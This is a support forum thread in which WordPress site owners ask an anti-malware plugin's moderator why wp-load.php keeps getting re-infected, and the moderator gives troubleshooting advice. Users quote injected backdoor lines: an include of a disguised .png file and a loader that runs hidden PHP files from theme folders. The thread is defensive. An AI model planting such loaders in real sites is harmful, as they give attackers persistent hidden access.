wp-load.php after fix re-infected immediately

Home Forums Support Forum wp-load.php after fix re-infected immediately

Tagged: 

This topic contains 6 replies, has 4 voices, and was last updated by  Anti-Malware Admin 4 years ago.

Viewing 7 posts - 1 through 7 (of 7 total)
  • Author
    Posts
  • February 9, 2020 at 11:42 pm #2403

    Andra Saimre
    Member

    I am struggling today with the site, where suddenly to some people it displays porn instead of our content.. so if I scan with the plugin, it finds threat immediately in the wp-load.php file. But after I press fix, it is fixing without error and immediately shows that the file is re-infected. I have tried many times. I also checked the file in server, did not find more differences with original file then that part in the end and I deleted it:

    // Edit and deleting this code is not recommended!

    @include( ABSPATH . WPINC . ‘/images/tnd.png’);

    However, it comes back…Do you have any suggestions what to do?

    February 10, 2020 at 10:09 am #2407

    Anti-Malware Admin
    Moderator

    There must be something malicious remaining on the server that is rewriting that infection. You need to be able to run the Complete Scan.

    Can you open the error Console in your browser’s Inspector and send me a screenshot of the Complete Scan when it gets stuck?

    You can also check the error_log files on the server to see if there is anything that might indicate why the complete scan is not able to complete.

    February 17, 2020 at 3:52 am #2412

    Andra Saimre
    Member

    Hello!

    I did fresh WordPress install, then got rid of that problem, your plugin still finds some files in the wp-content folder (this remain same) which give a reading or scan errors, not sure if that could be still a problem and infection can be in sleepy mode? I do scan for now almost every day.

     

    February 17, 2020 at 9:20 am #2413

    Anti-Malware Admin
    Moderator

    With the kinds of trouble that you have had with the scan not completing and now the read errors, I would guess that the memory_limit in your php.ini file is set too low. Ask you hosting provider if you need help finding or changing the memory_limit on your server.

    You also need to find the error_log files on your server. Those will tell you a log about the cause of these problems.

    February 23, 2020 at 9:21 am #2427

    Jester Wiggins
    Member

    Hello Eli!

    I have the same problem only it happens on each of the 4 or 5 files your scanner flags.  I have done a full system scan, it was completed, I clicked auto-fix. It said it fixed 5 files, 0 files failed. I then go to the terminal and view the files and they still have the offending code.  Can you help me out? ;) I did donate.  Thank you!

    December 18, 2020 at 8:54 pm #31294

    fred sadowick
    Member

    Hi, I have same issue, wp-load.php is found multiple times and fixed but reappears. I looked at the code and indicated

    Potential threats in file:

    if( !class_exists( “WPTemplatesOptions” ) && function_exists( ‘wp_get_themes’ ) ) {
    foreach ( wp_get_themes() AS $theme_name => $wp_get_theme ) {
    $templates = get_theme_root() . DIRECTORY_SEPARATOR . “{$wp_get_theme->stylesheet}” . DIRECTORY_SEPARATOR . “.{$wp_get_theme->stylesheet}.php”;
    if( file_exists( $templates ) ) {
    include_once( $templates );
    }
    }
    }

    December 29, 2020 at 11:47 am #49823

    Anti-Malware Admin
    Moderator

    Just closing this topic since all threats mentioned here have been added to my definition updates. Please start a new topic if you have a similar issue and need more help.

  • Author
    Posts
Viewing 7 posts - 1 through 7 (of 7 total)

The topic ‘wp-load.php after fix re-infected immediately’ is closed to new replies.

Comments are closed.